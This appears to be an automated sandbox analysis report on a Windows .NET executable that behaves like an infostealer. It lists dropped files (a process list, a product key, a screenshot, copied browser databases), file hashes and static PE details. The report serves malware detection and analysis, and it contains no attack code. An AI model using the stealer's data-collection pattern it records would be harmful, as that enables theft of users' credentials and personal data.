Preview:	NAME: svchost..PID: 2584..EXE: C:\Windows\system32\svchost.exe..NAME: KoQmjyOyjKTRc..PID: 424..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..PID: 7596..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..PID: 3868..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: csrss..PID: 412..EXE: ..NAME: KoQmjyOyjKTRc..PID: 7428..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: svchost..PID: 6440..EXE: C:\Windows\system32\svchost.exe..NAME: Memory Compression..PID: 1568..EXE: ..NAME: KoQmjyOyjKTRc..PID: 6868..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..PID: 6436..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: K

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\System\ProductKey.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.8404025467025056
Encrypted:	false
SSDEEP:	3:S4d+d9Zu833n:SVHZz
MD5:	6BB1209B95CE748B8E42A04349B06AE4
SHA1:	F51E2CD9FE360A9E9B17844EDBADD28A4A459942
SHA-256:	497FCF89145E48E0D29067F7BB8993F8C0EA10202FE0649B736AB6E49A302C6F
SHA-512:	B7C6B63B2D65664E48B8B3F91CD5458DA678024066C4D66B92CDCC524034D2D0AB4FAE3271AEE6D43D83193534179B580CCCEAADD027F6CE8DD7E3233DA18479
Malicious:	false
Preview:	K8WN8-MRK8J-B3M2C-XYYWH-YRQ3J

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\System\ScanningNetworks.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	84
Entropy (8bit):	4.6630509827051725
Encrypted:	false
SSDEEP:	3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
MD5:	58CD2334CFC77DB470202487D5034610
SHA1:	61FA242465F53C9E64B3752FE76B2ADCCEB1F237
SHA-256:	59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
SHA-512:	C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
Malicious:	false
Preview:	Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\System\Windows.txt

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16835
Entropy (8bit):	5.6477224913181265
Encrypted:	false
SSDEEP:	96:THGHUHQH1HCHVH29H0H0HWHLH/HEHeHkHRtJHSHBHsHIHfHaHGOHPHqHmHFVHQHk:utYJzoRjx
MD5:	73C59D482B8495C6C9CF77520C6AE689
SHA1:	2D658D03EA119CD3712A2AFE10A8E38EE525F692
SHA-256:	E37FD8C60BB1D28FFACE9287BD90EAC5E81A88BAADC13F155A1F8FBB31DC54FE
SHA-512:	1E2F3C77CBBE0014A65A1CB2AE6675A071E5541464BE5CF1E5E2778A9C177DA26E3922BD08DFDD0D1D92D1AF10A5C7855696E12714D970362618A648FAE87FB5
Malicious:	false
Preview:	NAME: KoQmjyOyjKTRc..TITLE: New Tab - Google Chrome..PID: 424..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..TITLE: New Tab - Google Chrome..PID: 7596..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..TITLE: New Tab - Google Chrome..PID: 3868..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..TITLE: New Tab - Google Chrome..PID: 7428..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..TITLE: New Tab - Google Chrome..PID: 6868..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKTRc..TITLE: New Tab - Google Chrome..PID: 6436..EXE: C:\Program Files (x86)\NMLGuXAXnlaxkyvhFMAuqRltItYcAPYfCiIKCYIFzZxtxmLdqpxz\KoQmjyOyjKTRc.exe..NAME: KoQmjyOyjKT

C:\Users\user\AppData\Local\32994a3dcd128eb1bed26629f65ce081\user@536720_en-CH\System\WorldWind.jpg

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	97853
Entropy (8bit):	7.877954599118628
Encrypted:	false
SSDEEP:	1536:ChJx8Ro4EocfjcahGNI5ljKOqY2NQCBmmTEx5X07SrjbS9/HF74cfqRJLx/Q6t8J:yJ2Ro4EocfjcahGSUBFBmbX07sy9/6cj
MD5:	6C3859AA74B1A40AB1A549778A9D11B9
SHA1:	EA5BBD7836DA59DAC59003F74AE88EAA125B9D36
SHA-256:	F610908370CDCB7AEE94866062AFCB64DC519AAB9E68A594BF24AADB9BF85AE7
SHA-512:	8CD9E430547723264F571A10ED62DBD8DE9A3EC0DCE3CD2CDFD39D9539899DA2A209751E55409C383927D8DAD13CE788ABEAC7BABF81EAF934577E22AA24DAAD
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..?3...m..,.X.c.#....O..i.....w...._.#.z..p.....MR...%.f..r.....Uf.....?.2......S.]9o..s......T..W6.y.:.....CPWJi......%-....Z(.(..<.t..A...#'..N>.._.u.......^y.[......1..].+..B....%?........r.....{f`.'(Xw...&e.......Q...8X.V..._.^.(..(...&(.........k.._:U.d..2.v..G..\^)a.........Q.......?.A.9..@...'...G. .....w.G.....;.n..3...W...:<r.]...yl......6A

C:\Users\user\AppData\Local\4d0e4a1e8a64206be052a57d6d8e2cf5\msgid.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	very short file (no magic)
Category:	modified
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
Preview:	0

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FUEvp5c8lO.exe.log

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Temp\places.raw

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3737.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3757.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3758.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3769.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp377A.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1371207751183456
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/I4:MnlyfnGtxnfVuSVumEHFw4
MD5:	643AC1E34BE0FDE5FA0CD279E476DF3A
SHA1:	241B9EA323D640B82E8085803CBE3F61FEEA458F
SHA-256:	C44B4270F1F0B4FCB13533D2FC023443DBAFB24D355286C6AE1493DBCD96B7E2
SHA-512:	73D0F938535D93CC962EF752B1544FA8A2E4194C8979FB4778D0B84B70D32C6EDF8CC8559C9CEFBAF9681FB3BC1D345086AFCA4CA5FC8FB88100E48679AB1EF8
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp378A.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37AA.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1221538113908904
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5:	C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1:	6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256:	CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512:	01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37BB.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	51200
Entropy (8bit):	0.8746135976761988
Encrypted:	false
SSDEEP:	96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
MD5:	9E68EA772705B5EC0C83C2A97BB26324
SHA1:	243128040256A9112CEAC269D56AD6B21061FF80
SHA-256:	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp37BC.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp384A.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp385A.tmp.dat

Download File

Process:	C:\Users\user\Desktop\FUEvp5c8lO.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03862698848467049
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxAserRNbekZ3DmVxL1HI:58r54w0VW3xWmfRFj381
MD5:	507BA3B63F5856A191688A30D7E2A93A
SHA1:	1B799649D965FF1562753A9EB9B04AC83E5D7C57
SHA-256:	10A34BE61CD43716879A320800A262D0397EA3A8596711BDAE3789B08CB38EF8
SHA-512:	7750584100A725964CAE3A95EC15116CDFE02DE94EFE545AA84933D6002C767F6D6AF9D339F257ED80BDAD233DBF3A1041AB98AB4BF8B6427B5958C66DCEB55F
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.633256983676015
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	FUEvp5c8lO.exe
File size:	778'752 bytes
MD5:	d2b8506820fe3c39b6b5e891170f3451
SHA1:	30f6fa21f06d99b0254fa1ff387c45921317eda7
SHA256:	e1e6a513abf55583458cd88ec8b7af9ce2a60d169526b0e6a31183a7688b8480
SHA512:	15b10c694ff797b8ffbcde18752c2df2d16f961d367794df7f8932bb5bc861faef9984b6b780910eb28c5e1caaa302a0d39d9ca44fb988e84a232d24b7f28781
SSDEEP:	12288:YjlIpHtMPku+l0CPPoJts5Pic17D44ehsA4iFMZUiqrbA8yJNB:YjlIhSPd+pWtAPic17Dehx442B
TLSH:	BCF4BFC07B26B701CD6CB570852AEEB8625C2F68700879F27EEE374775B9152AA1CF05
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Zg..............0..\..........*{... ........@.. .......................@............@................................

File Icon


Icon Hash:	83356d4d454d2986

Static PE Info

General

Entrypoint:	0x4b7b2a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x675A97A9 [Thu Dec 12 07:58:33 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7ad8	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb8000	0x8088	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
